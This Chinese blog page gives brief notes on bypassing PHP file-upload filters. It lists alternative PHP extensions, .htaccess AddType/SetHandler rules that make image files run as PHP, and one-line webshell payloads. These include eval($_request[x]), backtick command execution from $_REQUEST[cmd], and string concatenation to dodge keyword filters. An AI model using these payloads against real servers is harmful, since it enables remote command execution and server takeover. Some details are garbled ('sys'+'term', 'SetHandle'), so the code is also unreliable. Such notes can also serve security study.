首页 > 其他分享 >文件上传

文件上传

时间:2022-11-02 10:13:28浏览次数:44  
标签:文件 解析 系统命令 htaccess eval php 上传

一、后缀名绕过

1、默认情况下,lamp会将php\phtml\php3\php4\php5\pht等文件解析为php

1、php\php5\php4\php3\php2\phtml\pht

 2、特殊后缀.htaccess/.user.ini

.htaccess  //.htaccess是apache的配置文件,只能在存在apache的中间件时才能生效。定义了重写当前目录下的解析规则
AddType application/x-httpd-php .jpg /将当前目录下的jpg文件解析为php文件
SetHandle application/x-httpd-php //将当前目录下的所所有文件解析为php文件

二、内容过滤

<? 过滤:绕过方法 <script language>eval($_request[x]);</script>  //php版本<7
php过滤:短标签<?=ls?> //直接执行系统命令没有输出; <?=`ls`?>//直接执行系统命令有输出; <?=`$_REQUEST[cmd]`?> //cmd直接执行系统命令
eval过滤:
  换函数,assert\system
  大小写绕过:
  动态拼接:$a='sys';$b='term';$c=$a.$b;<?php $c($request[x]);?> //eval函数不能拼接,assert、system可以
运算:异或运算
  

 

标签:文件,解析,系统命令,htaccess,eval,php,上传
From: https://www.cnblogs.com/Shepherd-boy/p/16847217.html

相关文章

  • spark读取文件方式
    一、调用hadoopfile方法读取TXT文件,针对复杂的分割方式,例如|+|,;等valgbkPath=s"/bdtj/line/DD_OUT_NOW_LV_$month.txt"//文件路径//将gbkPath以参数的形式传入进行读取......
  • 5行代码写完文件上传-PHP版
    5行代码写完文件上传-PHP版html代码index.html<formname="upload"method="post"enctype="multipart/form-data"action="/index.php"><inputtype="file"nam......
  • GCC使用预编译头文件
    GCC使用预编译头文件通常大型项目有许多头文件,每个源文件中都包含很多头文件。编译器一遍又一遍地处理这些头文件所花费的时间几乎可以占据构建项目的所有时间。为了使构......
  • 文件IO-chmod-fchmod
    第一版代码/* LinuxAPI:chown function:C实现chmod函数功能,修改文件权限*/#include<stdio.h>#include<stdlib.h>#include<sys/stat.h>intmain(intargc,......
  • Qt之菜单栏中文件的写入、打开、保存
    在常见的记事本中,通常都有打开文件,写入文件、保存文件等功能,今天就用Qt来写一下记事本的打开、写入、保存等功能一、创建菜单栏QMenu*fileMenu=menuBar()->addMe......
  • Linux学习笔记(第八篇)磁盘与文件系统管理
    ​​Linux学习笔记(第零篇)计算机基础​​Linux学习笔记(第零篇)Linux文件系统及ShellLinux学习笔记(第一篇)零散命令Linux学习笔记(第二篇)目录操作命令Linux学习笔记(第三篇)文件操......
  • Linux学习笔记(第十六篇)访问网络文件共享服务
    ​​Linux学习笔记(第零篇)计算机基础​​Linux学习笔记(第零篇)Linux文件系统及ShellLinux学习笔记(第一篇)零散命令Linux学习笔记(第二篇)目录操作命令Linux学习笔记(第三篇)文件操......
  • asp.net core 解决用户上传文件提示 System.UnauthorizedAccessException: Access to
    今天发布项目到服务器上传文件突然提示System.UnauthorizedAccessException:Accesstothepath'C:\Windows\TEMP\ASPNETCORE_e65c14f7-e337-493c-90ac-d49a48db7187.t......
  • 2022 CSP-S GX 迷惑行为大赏(P1 文件读写篇)
    文件的的读写错误一直都被oier们深恶痛绝津津乐道,我们在看乐子bushi的同时也应该注意,不要一失足成千古恨,3年oi一场空。在广西的S组选手中,有21份代码中出现了//freo......
  • 【批量下载】url——wget,给定网址,批量下载文件
    写在前面:最近在学习批量下载sci文章并传入noteexpress,从网上学来了一些方法,其中有一步需要使用url将sci-hub上面的文章批量下载下来。学习网址:【研究生】快速批量下载Web......